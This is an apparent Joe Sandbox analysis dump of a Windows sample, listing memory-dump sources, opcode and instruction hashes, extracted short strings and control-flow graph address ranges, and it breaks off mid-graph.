                                                                                                                        • Instruction Fuzzy Hash: F1221372E5DA865FE788DA68945A6BC7BE1FF55B40B0444BEC00ECB2D2DD2C6882C711
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e377d948e91039d2758d658176ad9d8995b44df1524e3c4ffc12cd15aec44c7d
                                                                                                                        • Instruction ID: f81676ae0d00b2353466cf897dee94f951ba9ee1d2d9d6a152eac772e7255a0b
                                                                                                                        • Opcode Fuzzy Hash: e377d948e91039d2758d658176ad9d8995b44df1524e3c4ffc12cd15aec44c7d
                                                                                                                        • Instruction Fuzzy Hash: D70222B2E5DA865FE788DA68505A67C7BE1FF55B40B0844BEC00ECB2D3DD2C6886C711
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 62d607d6b6e0278679de1c186fa1d9f447252865d9436ae9ad9992fce65ba931
                                                                                                                        • Instruction ID: 62758be0531860dea813e0a8f1558af441c7ffcf05435fdb465444445921f8d8
                                                                                                                        • Opcode Fuzzy Hash: 62d607d6b6e0278679de1c186fa1d9f447252865d9436ae9ad9992fce65ba931
                                                                                                                        • Instruction Fuzzy Hash: FDF12362E5DA825FE38D9B78605A5787BE1FF59A5070444BEC04FCB2E3DD2C2881C351
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5e54a772ca9d480ecbcbb793c790a8830dbbcfac9889581b9086e94369fc9801
                                                                                                                        • Instruction ID: a096b09bb8333503bb28e7ca0635454bee2af9a53b4b9e2e5e0b7feff57da1bc
                                                                                                                        • Opcode Fuzzy Hash: 5e54a772ca9d480ecbcbb793c790a8830dbbcfac9889581b9086e94369fc9801
                                                                                                                        • Instruction Fuzzy Hash: F0022C3290D6CA5FD755DB7CC4906ED7BA0FF46254B2805BAC0A9CB1D3CB2CA846C7A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 52887e03442ac06874619f3123279dcd07fd2aa6a8921c112eb3712c2212b87f
                                                                                                                        • Instruction ID: 6cbaebf52d288941d2fb414ef4c7fb6df8804e360b01dbb46a0e140c4a5bff1c
                                                                                                                        • Opcode Fuzzy Hash: 52887e03442ac06874619f3123279dcd07fd2aa6a8921c112eb3712c2212b87f
                                                                                                                        • Instruction Fuzzy Hash: 45C1C321E8EE8B9FEAE9DA2C546163936E1FF58640B4801B9C91FC758FDD58EC01C390
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aa0ed1a1ed2e49ba0071d62393cc0b031d10f49767742954176096d0af75bdff
                                                                                                                        • Instruction ID: 4bf8a811d582078b660cdfd64c219c304cd6b6327f18103c933c19a943875b80
                                                                                                                        • Opcode Fuzzy Hash: aa0ed1a1ed2e49ba0071d62393cc0b031d10f49767742954176096d0af75bdff
                                                                                                                        • Instruction Fuzzy Hash: 80C112A2E5DA825FE79C9678605A57CBBE1FF55B40B0444BEC00ECB2E3DD2C6846C252
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e53406d6eba9019f2481370d43e522e3834c650d0602972b3b43fc77eb25e3bc
                                                                                                                        • Instruction ID: 81398e5e7552ec0d29cd4ec61737a702b5209a9feba9d1a64c416ddf195b750b
                                                                                                                        • Opcode Fuzzy Hash: e53406d6eba9019f2481370d43e522e3834c650d0602972b3b43fc77eb25e3bc
                                                                                                                        • Instruction Fuzzy Hash: 7E81283185D6CA8FE3569B3488151E97FF1FF46250F0902BAE49ACB097D92C784BC792

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 216 7ff887d3a480-7ff887d58eea 219 7ff887d59121-7ff887d5912d 216->219 220 7ff887d58ef0-7ff887d58efc 216->220 223 7ff887d59504-7ff887d5950e 219->223 224 7ff887d59133-7ff887d5914a 219->224 220->219 225 7ff887d58f02-7ff887d58f0f 220->225 228 7ff887d5914d-7ff887d5915a 224->228 225->228 229 7ff887d58f15-7ff887d58f91 call 7ff887d3a490 225->229 237 7ff887d5915b-7ff887d5916b 229->237 238 7ff887d58f97-7ff887d58fe1 229->238 237->223 242 7ff887d59171-7ff887d59180 237->242 238->223 244 7ff887d58fe7-7ff887d58ffc 238->244 242->223 248 7ff887d59186-7ff887d59195 242->248 244->223 247 7ff887d59002-7ff887d59012 244->247 247->223 252 7ff887d59018-7ff887d59042 247->252 248->223 251 7ff887d5919b-7ff887d591c5 248->251 251->223 259 7ff887d591cb-7ff887d591fd 251->259 252->223 260 7ff887d59048-7ff887d5907a 252->260 259->223 268 7ff887d59203-7ff887d59239 259->268 260->223 267 7ff887d59080-7ff887d590b2 260->267 267->223 276 7ff887d590b8-7ff887d590e5 call 7ff887d3a480 267->276 268->223 275 7ff887d5923f-7ff887d59265 268->275 275->223 281 7ff887d5926b-7ff887d5928f 275->281 276->219 286 7ff887d592e5-7ff887d592ff 281->286 287 7ff887d59291-7ff887d592e3 281->287 286->223 287->286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0#L$0#L$0XL$0XL$x!L
                                                                                                                        • API String ID: 0-2672355180
                                                                                                                        • Opcode ID: 580ae82f4a162965277f854b8483ff87c178a061ebd578e0dde4eb2650c20abc
                                                                                                                        • Instruction ID: 1e5fb37e0d94ce789bb8a149fe93b925087fa27a5f40311cd16c2675ee0412ba
                                                                                                                        • Opcode Fuzzy Hash: 580ae82f4a162965277f854b8483ff87c178a061ebd578e0dde4eb2650c20abc
                                                                                                                        • Instruction Fuzzy Hash: E0D15C30B199494FEAE4EB2C9498B7977E2FFA834174541FAD40ECB2AADE24DC41C741

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1301 7ff887d2aab8 1302 7ff887d56b30-7ff887d56b43 1301->1302 1303 7ff887d56b09-7ff887d56b2a 1302->1303 1304 7ff887d56b45 1302->1304 1303->1302 1305 7ff887d56bbf-7ff887d56bff 1304->1305 1306 7ff887d56b47-7ff887d56b5f 1304->1306 1308 7ff887d56b65-7ff887d56b79 1306->1308 1309 7ff887d57bd3-7ff887d57bef 1306->1309 1316 7ff887d56b7f-7ff887d56ba3 1308->1316 1317 7ff887d56c0b-7ff887d56c22 1308->1317 1313 7ff887d57bf7-7ff887d57c59 1309->1313 1314 7ff887d57bf1-7ff887d57bf5 1309->1314 1325 7ff887d57c5b-7ff887d57c67 1313->1325 1326 7ff887d57ca1-7ff887d57cb5 call 7ff887d2aac0 1313->1326 1314->1313 1316->1317 1333 7ff887d56ba5-7ff887d56bac 1316->1333 1323 7ff887d56cbd-7ff887d56cd0 1317->1323 1324 7ff887d56c28-7ff887d56c55 1317->1324 1332 7ff887d56cd3-7ff887d56cea 1323->1332 1324->1323 1343 7ff887d56c57-7ff887d56c5b 1324->1343 1340 7ff887d57c8e-7ff887d57ca0 1325->1340 1341 7ff887d57c69-7ff887d57c78 1325->1341 1338 7ff887d57ccb-7ff887d57cd7 1326->1338 1339 7ff887d57cb7-7ff887d57cca 1326->1339 1344 7ff887d56cec-7ff887d56cf0 1332->1344 1345 7ff887d56d07-7ff887d56d1a 1332->1345 1333->1309 1337 7ff887d56bb2-7ff887d56bbb 1333->1337 1337->1305 1352 7ff887d57ce8-7ff887d57cef 1338->1352 1353 7ff887d57cd9-7ff887d57ce6 1338->1353 1341->1326 1354 7ff887d57c7a-7ff887d57c8c 1341->1354 1343->1323 1346 7ff887d56c5d-7ff887d56c61 1343->1346 1344->1345 1349 7ff887d56cf2-7ff887d56cf9 1344->1349 1345->1332 1358 7ff887d56d1c-7ff887d56d34 1345->1358 1346->1309 1350 7ff887d56c67-7ff887d56c71 1346->1350 1349->1309 1355 7ff887d56cff-7ff887d56d02 1349->1355 1356 7ff887d56c8a-7ff887d56c98 1350->1356 1357 7ff887d56c73-7ff887d56c80 1350->1357 1363 7ff887d57cf5-7ff887d57d0c 1352->1363 1353->1363 1354->1326 1354->1340 1355->1345 1356->1309 1362 7ff887d56c9e-7ff887d56cb0 1356->1362 1357->1356 1364 7ff887d56c82-7ff887d56c88 1357->1364 1368 7ff887d56d36-7ff887d56d3a 1358->1368 1369 7ff887d56d51-7ff887d56d7e 1358->1369 1362->1309 1366 7ff887d56cb6-7ff887d56cb9 1362->1366 1371 7ff887d57d0e-7ff887d57d1a 1363->1371 1372 7ff887d57d1b-7ff887d57d39 call 7ff887d43e00 1363->1372 1364->1356 1366->1323 1368->1369 1374 7ff887d56d3c-7ff887d56d43 1368->1374 1380 7ff887d56eaa-7ff887d56ebd 1369->1380 1381 7ff887d56d84-7ff887d56d88 1369->1381 1371->1372 1382 7ff887d57d4c-7ff887d57d9d call 7ff887d39650 1372->1382 1383 7ff887d57d3b-7ff887d57d4a call 7ff887d39000 1372->1383 1374->1309 1377 7ff887d56d49-7ff887d56d4c 1374->1377 1377->1369 1381->1380 1385 7ff887d56d8e-7ff887d56d92 1381->1385 1398 7ff887d57d9f-7ff887d57da2 1382->1398 1399 7ff887d57da4-7ff887d57dd2 1382->1399 1383->1382 1385->1309 1388 7ff887d56d98-7ff887d56da2 1385->1388 1391 7ff887d56dbb-7ff887d56de2 1388->1391 1392 7ff887d56da4-7ff887d56db9 1388->1392 1401 7ff887d56de4-7ff887d56df2 1391->1401 1402 7ff887d56df6-7ff887d56dfb 1391->1402 1392->1391 1398->1399 1403 7ff887d57dd9-7ff887d57de5 1398->1403 1399->1403 1401->1402 1402->1380 1407 7ff887d57deb-7ff887d57dfe 1403->1407 1408 7ff887d57eb3-7ff887d57ec6 1403->1408 1413 7ff887d57e16-7ff887d57e29 1407->1413 1414 7ff887d57e00-7ff887d57e0a call 7ff887d2aaa0 1407->1414 1411 7ff887d57ede-7ff887d57ef1 1408->1411 1412 7ff887d57ec8-7ff887d57ed2 call 7ff887d2aaa0 1408->1412 1425 7ff887d57f14-7ff887d57f19 1411->1425 1426 7ff887d57ef3-7ff887d57f06 1411->1426 1412->1411 1423 7ff887d57ed4-7ff887d57ed9 1412->1423 1421 7ff887d57e4c-7ff887d57e51 1413->1421 1422 7ff887d57e2b-7ff887d57e3e 1413->1422 1414->1413 1424 7ff887d57e0c-7ff887d57e11 1414->1424 1427 7ff887d57f6d-7ff887d57fa1 1421->1427 1433 7ff887d57e56-7ff887d57e69 1422->1433 1434 7ff887d57e40-7ff887d57e4a call 7ff887d2aaa0 1422->1434 1423->1427 1424->1427 1425->1427 1430 7ff887d57f08-7ff887d57f12 call 7ff887d2aaa0 1426->1430 1431 7ff887d57f1b-7ff887d57f2e 1426->1431 1442 7ff887d580d5-7ff887d580f0 1427->1442 1443 7ff887d57fa7-7ff887d58021 call 7ff887d2a9e8 1427->1443 1430->1425 1430->1431 1444 7ff887d57f37-7ff887d57f4a 1431->1444 1445 7ff887d57f30-7ff887d57f35 1431->1445 1446 7ff887d57e6b-7ff887d57e70 1433->1446 1447 7ff887d57e75-7ff887d57e88 1433->1447 1434->1421 1434->1433 1466 7ff887d58059 1443->1466 1467 7ff887d58023-7ff887d58032 1443->1467 1455 7ff887d57f4c-7ff887d57f5f 1444->1455 1456 7ff887d57f61-7ff887d57f66 1444->1456 1445->1427 1446->1427 1453 7ff887d57e9f-7ff887d57ea4 1447->1453 1454 7ff887d57e8a-7ff887d57e9d 1447->1454 1453->1427 1454->1453 1461 7ff887d57ea9-7ff887d57eae 1454->1461 1455->1456 1460 7ff887d57f68 1455->1460 1456->1427 1460->1427 1461->1427 1468 7ff887d5805b-7ff887d5807a call 7ff887d2ab10 call 7ff887d2aae8 1466->1468 1467->1466 1471 7ff887d58034-7ff887d58057 1467->1471 1474 7ff887d5807f-7ff887d581f5 call 7ff887d44010 call 7ff887d2aac8 call 7ff887d56960 call 7ff887d565d0 call 7ff887d56800 call 7ff887d569f0 1468->1474 1471->1468
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0#L$XkH$x!L
                                                                                                                        • API String ID: 0-2946366064
                                                                                                                        • Opcode ID: 44dc0dbca8fe232a4ab7de66147ea434c89f1577921e179f23dc22a9bd06f845
                                                                                                                        • Instruction ID: 96d93ab03a876d3d53e5a98d277c82b01cb7bfce6b9a8f794dd40619578cf73f
                                                                                                                        • Opcode Fuzzy Hash: 44dc0dbca8fe232a4ab7de66147ea434c89f1577921e179f23dc22a9bd06f845
                                                                                                                        • Instruction Fuzzy Hash: EA529F30A5D9854FEB68DB2C9445A7837E1FF59750F1802BAE04ECB2ABCE28EC41C745

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: r6B$r6B${'
                                                                                                                        • API String ID: 0-486699241
                                                                                                                        • Opcode ID: 4092dc08b6b6f7285f2432572a140d5a7b0a26043a70c1b2ea5c48f699004160
                                                                                                                        • Instruction ID: 2e085e0f896f345364411b42a66c9596f2c24ae84a8a4846b13d478e54cbf7ee
                                                                                                                        • Opcode Fuzzy Hash: 4092dc08b6b6f7285f2432572a140d5a7b0a26043a70c1b2ea5c48f699004160
                                                                                                                        • Instruction Fuzzy Hash: 1691D731F58A494FD765EB2C98456BDB7F1FF98750F0402BAD44ED3286EE34A8828781

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: r6B$r6B${'
                                                                                                                        • API String ID: 0-486699241
                                                                                                                        • Opcode ID: 702a05ee54c5fab8393be82e45111f19bdda39803a5b9b3744518347a21040a8
                                                                                                                        • Instruction ID: e27ad91caeb235d9fbd11e9b4bc062b189630f792599cb49d11bc0fec2cc1e75
                                                                                                                        • Opcode Fuzzy Hash: 702a05ee54c5fab8393be82e45111f19bdda39803a5b9b3744518347a21040a8
                                                                                                                        • Instruction Fuzzy Hash: AE91C631E58A494FD764EA2C98456BDB7F1FF98750F04427AD44ED3286EE34A8828781

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1721 7ff887d118c7-7ff887d118d0 1722 7ff887d1192b-7ff887d11951 1721->1722 1723 7ff887d118d2-7ff887d118ee 1721->1723 1730 7ff887d11953-7ff887d1195c 1722->1730 1726 7ff887d11a3f-7ff887d11a5f 1723->1726 1727 7ff887d118f4-7ff887d11909 1723->1727 1727->1730 1733 7ff887d1190b-7ff887d11926 1727->1733 1731 7ff887d11962-7ff887d11981 1730->1731 1732 7ff887d11a36-7ff887d11a39 call 7ff887d11a60 1730->1732 1738 7ff887d1199d-7ff887d119a7 1731->1738 1739 7ff887d11983-7ff887d1199b 1731->1739 1740 7ff887d11a3e 1732->1740 1733->1726 1742 7ff887d119a9-7ff887d119ad 1738->1742 1743 7ff887d119e7-7ff887d119f1 1738->1743 1739->1743 1740->1726 1745 7ff887d11a30-7ff887d11a35 1742->1745 1746 7ff887d119b3-7ff887d119e4 1742->1746 1747 7ff887d11a2b 1743->1747 1748 7ff887d119f3-7ff887d11a23 1743->1748 1745->1732 1746->1743 1747->1745 1748->1731 1753 7ff887d11a29 1748->1753 1753->1732
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: r6B$r6B$r6B
                                                                                                                        • API String ID: 0-1049672097
                                                                                                                        • Opcode ID: 699c06830f8e4dd70748c982eed477240440d85cc65fc9930d68710510f8e3e8
                                                                                                                        • Instruction ID: ee74ecadb4aa9bfd78d2e5c16e44ddc31e52952d736a5c11f58c2c7daa8e330a
                                                                                                                        • Opcode Fuzzy Hash: 699c06830f8e4dd70748c982eed477240440d85cc65fc9930d68710510f8e3e8
                                                                                                                        • Instruction Fuzzy Hash: 4E51B671E5C54A8FDB58DA5894512BCB7F2FF88740F141279D06EE3286CE396C02C765

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1755 7ff887d1e6f5-7ff887d1e817 1772 7ff887d1e819-7ff887d1e853 1755->1772 1773 7ff887d1e886-7ff887d1e897 1755->1773 1772->1773 1774 7ff887d1e899 1773->1774 1775 7ff887d1e89e-7ff887d1e8ce 1773->1775 1774->1775 1779 7ff887d1e8d4-7ff887d1e8e6 1775->1779 1780 7ff887d1ed17-7ff887d1ed41 1775->1780 1781 7ff887d1ecca 1779->1781 1782 7ff887d1e8ec-7ff887d1e91b 1779->1782 1788 7ff887d1edbb-7ff887d1edcc 1780->1788 1789 7ff887d1ed43-7ff887d1ee2a call 7ff887d1d0c8 1780->1789 1785 7ff887d1eccf-7ff887d1ece8 1781->1785 1786 7ff887d1e91d-7ff887d1e942 1782->1786 1787 7ff887d1e96e-7ff887d1e99b 1782->1787 1792 7ff887d1ecee-7ff887d1ed11 1785->1792 1793 7ff887d1e9c3-7ff887d1e9d5 1785->1793 1797 7ff887d1e948-7ff887d1e96c 1786->1797 1798 7ff887d1ed82-7ff887d1edb4 1786->1798 1812 7ff887d1e9a2-7ff887d1e9bd 1787->1812 1790 7ff887d1edce-7ff887d1edd3 1788->1790 1791 7ff887d1edd4-7ff887d1ee1f 1788->1791 1790->1791 1792->1779 1792->1780 1793->1781 1801 7ff887d1e9db-7ff887d1e9e7 1793->1801 1797->1787 1798->1788 1802 7ff887d1e9e9-7ff887d1ea15 call 7ff887d10418 1801->1802 1803 7ff887d1ea2b-7ff887d1ea2f 1801->1803 1819 7ff887d1ea1a-7ff887d1ea2a 1802->1819 1807 7ff887d1ea31-7ff887d1ea63 call 7ff887d1bb10 1803->1807 1808 7ff887d1ea64-7ff887d1ea68 1803->1808 1807->1808 1817 7ff887d1ea6a-7ff887d1ea8f 1808->1817 1818 7ff887d1eadf-7ff887d1eb01 1808->1818 1812->1792 1812->1793 1822 7ff887d1eb08-7ff887d1eb1b 1817->1822 1829 7ff887d1ea91-7ff887d1ead7 1817->1829 1818->1822 1819->1803 1825 7ff887d1eb59-7ff887d1ebb2 call 7ff887d1ee2b call 7ff887d1ee78 1822->1825 1826 7ff887d1eb1d-7ff887d1eb26 1822->1826 1825->1785 1843 7ff887d1ebb8-7ff887d1ec0a 1825->1843 1827 7ff887d1eb38-7ff887d1eb4f 1826->1827 1828 7ff887d1eb28-7ff887d1eb2e 1826->1828 1827->1825 1838 7ff887d1eb51-7ff887d1eb52 1827->1838 1828->1827 1838->1825 1848 7ff887d1ecc0-7ff887d1ecc8 call 7ff887d1eec5 1843->1848 1849 7ff887d1ec10-7ff887d1ec2f 1843->1849 1848->1785 1852 7ff887d1ec48-7ff887d1ec71 1849->1852 1853 7ff887d1ec31-7ff887d1ec3e 1849->1853 1860 7ff887d1ec73-7ff887d1ec9b call 7ff887d15dd8 1852->1860 1861 7ff887d1eca2-7ff887d1ecba 1852->1861 1853->1852 1857 7ff887d1ec40-7ff887d1ec46 1853->1857 1857->1852 1860->1861 1861->1848 1861->1849
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8ML$XE
                                                                                                                        • API String ID: 0-3339832896
                                                                                                                        • Opcode ID: 02c1e4db0db58e057a58efb2c154a7685374a67fdd6d757f41a3e2aea442c9fc
                                                                                                                        • Instruction ID: 9b3231dfd7f319e7bbcf3c1914ca85253ccb6d3eb8068aaac62818dc2e78f5b4
                                                                                                                        • Opcode Fuzzy Hash: 02c1e4db0db58e057a58efb2c154a7685374a67fdd6d757f41a3e2aea442c9fc
                                                                                                                        • Instruction Fuzzy Hash: 33428530A0894A8FDB98EF18C495BADB7F2FF58341F144669D41EC729ADE34E842CB51

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2263 7ff887d49fc0-7ff887d4a020 2264 7ff887d4a02c-7ff887d4a03e 2263->2264 2265 7ff887d4a022-7ff887d4a027 call 7ff887d30ba0 2263->2265 2267 7ff887d4a040-7ff887d4a050 2264->2267 2268 7ff887d4a052-7ff887d4a0a9 2264->2268 2265->2264 2267->2268 2271 7ff887d4a0af-7ff887d4a0c1 2268->2271 2272 7ff887d4a3a9-7ff887d4a3bf 2268->2272 2273 7ff887d4a1bd-7ff887d4a1c1 2271->2273 2274 7ff887d4a0c7-7ff887d4a0cf 2271->2274 2283 7ff887d4a3c9-7ff887d4a41e 2272->2283 2284 7ff887d4a3c1-7ff887d4a3c8 2272->2284 2277 7ff887d4a244-7ff887d4a24e 2273->2277 2278 7ff887d4a1c7-7ff887d4a1d1 2273->2278 2274->2272 2275 7ff887d4a0d5-7ff887d4a0ed 2274->2275 2279 7ff887d4a17f-7ff887d4a1a2 2275->2279 2280 7ff887d4a0f3-7ff887d4a124 2275->2280 2281 7ff887d4a279-7ff887d4a27c 2277->2281 2282 7ff887d4a250-7ff887d4a260 call 7ff887d30bc0 2277->2282 2278->2272 2285 7ff887d4a1d7-7ff887d4a1e8 2278->2285 2279->2272 2288 7ff887d4a1a8-7ff887d4a1b7 2279->2288 2286 7ff887d4a138-7ff887d4a17d 2280->2286 2287 7ff887d4a126-7ff887d4a136 2280->2287 2290 7ff887d4a27f-7ff887d4a28e 2281->2290 2299 7ff887d4a265-7ff887d4a272 2282->2299 2303 7ff887d4a43b-7ff887d4a44c 2283->2303 2304 7ff887d4a420-7ff887d4a426 2283->2304 2284->2283 2285->2290 2286->2279 2298 7ff887d4a1ed-7ff887d4a1f7 2286->2298 2287->2286 2288->2273 2288->2274 2290->2272 2293 7ff887d4a294-7ff887d4a2b2 2290->2293 2293->2272 2297 7ff887d4a2b8-7ff887d4a2f1 2293->2297 2297->2272 2313 7ff887d4a2f7-7ff887d4a319 2297->2313 2301 7ff887d4a1f9 2298->2301 2302 7ff887d4a203-7ff887d4a213 2298->2302 2299->2281 2301->2302 2302->2272 2308 7ff887d4a219-7ff887d4a243 2302->2308 2309 7ff887d4a45d-7ff887d4a480 2303->2309 2310 7ff887d4a44e-7ff887d4a45c 2303->2310 2306 7ff887d4a428-7ff887d4a439 2304->2306 2307 7ff887d4a481-7ff887d4a4c4 2304->2307 2306->2303 2306->2304 2322 7ff887d4a4d8-7ff887d4a4e5 2307->2322 2323 7ff887d4a4c6-7ff887d4a4d6 2307->2323 2310->2309 2313->2272 2321 7ff887d4a31f-7ff887d4a331 2313->2321 2325 7ff887d4a394-7ff887d4a3a8 2321->2325 2326 7ff887d4a333-7ff887d4a33e 2321->2326 2323->2322 2326->2325 2329 7ff887d4a340-7ff887d4a357 2326->2329 2331 7ff887d4a368-7ff887d4a38f call 7ff887d30bc0 2329->2331 2332 7ff887d4a359-7ff887d4a365 2329->2332 2331->2325 2332->2331
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: b4B$d
                                                                                                                        • API String ID: 0-1886680559
                                                                                                                        • Opcode ID: a36cdfd7d063a3f7128a8ba172304ec7000c4a9aae17e2f8733359e4b5a14099
                                                                                                                        • Instruction ID: 213d7172feb8f542bef93ea6aafe3eed3cb0a797d5300a52f9d287e91e54fd2f
                                                                                                                        • Opcode Fuzzy Hash: a36cdfd7d063a3f7128a8ba172304ec7000c4a9aae17e2f8733359e4b5a14099
                                                                                                                        • Instruction Fuzzy Hash: 8502C230A58B498FD7A8DB58D4856B9B3E1FF94350F14467EC08EC369ADE35B842C781

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2337 7ff887d17f3a-7ff887d17f40 2338 7ff887d17f42-7ff887d17f83 2337->2338 2339 7ff887d17f96-7ff887d17fbf 2337->2339 2338->2339 2345 7ff887d1876e call 7ff887d16a70 2339->2345 2346 7ff887d17fc5-7ff887d18018 2339->2346 2351 7ff887d18773 2345->2351 2358 7ff887d1801a-7ff887d18054 2346->2358 2359 7ff887d18075-7ff887d180e9 2346->2359 2353 7ff887d18778-7ff887d1877d call 7ff887d16aa0 2351->2353 2360 7ff887d18782-7ff887d18787 call 7ff887d16ad0 2353->2360 2358->2353 2373 7ff887d1805a-7ff887d18073 2358->2373 2359->2360 2379 7ff887d180ef-7ff887d18162 2359->2379 2368 7ff887d18164-7ff887d1817e 2360->2368 2374 7ff887d1878c-7ff887d18791 call 7ff887d16b00 2368->2374 2375 7ff887d18184-7ff887d18213 2368->2375 2373->2359 2388 7ff887d18796-7ff887d187a8 2374->2388 2375->2388 2402 7ff887d18219-7ff887d18229 2375->2402 2379->2368 2390 7ff887d187ed-7ff887d187fe 2388->2390 2394 7ff887d18800 2390->2394 2395 7ff887d18805-7ff887d18828 2390->2395 2394->2395 2398 7ff887d1882a-7ff887d18871 2395->2398 2399 7ff887d188a4-7ff887d188b5 2395->2399 2400 7ff887d188bc-7ff887d188f7 2399->2400 2401 7ff887d188b7 2399->2401 2412 7ff887d188f9-7ff887d18943 2400->2412 2413 7ff887d18973-7ff887d18984 2400->2413 2401->2400 2409 7ff887d1822b-7ff887d1827d 2402->2409 2410 7ff887d1827f-7ff887d18543 call 7ff887d153d8 2402->2410 2409->2410 2410->2390 2565 7ff887d18549-7ff887d1b5da call 7ff887d16c28 2410->2565 2412->2413 2415 7ff887d1898b-7ff887d189c6 2413->2415 2416 7ff887d18986 